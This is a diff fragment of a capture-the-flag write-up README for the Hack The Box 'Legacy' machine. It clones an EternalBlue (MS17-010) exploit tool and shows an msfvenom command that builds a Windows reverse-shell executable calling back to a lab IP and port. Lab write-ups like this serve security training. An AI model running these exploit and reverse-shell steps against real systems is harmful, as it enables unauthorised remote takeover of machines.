rafamarrara/CTFs/HTB/Legacy/README.md

 $ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
 ```

-We will need a shell code to send to the target and execute to get a reverse shell.
+We will need to send to the target a shell code.
+Let's use `msfvenom` to generate it.

 ```
 $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe -o ms17-010.exe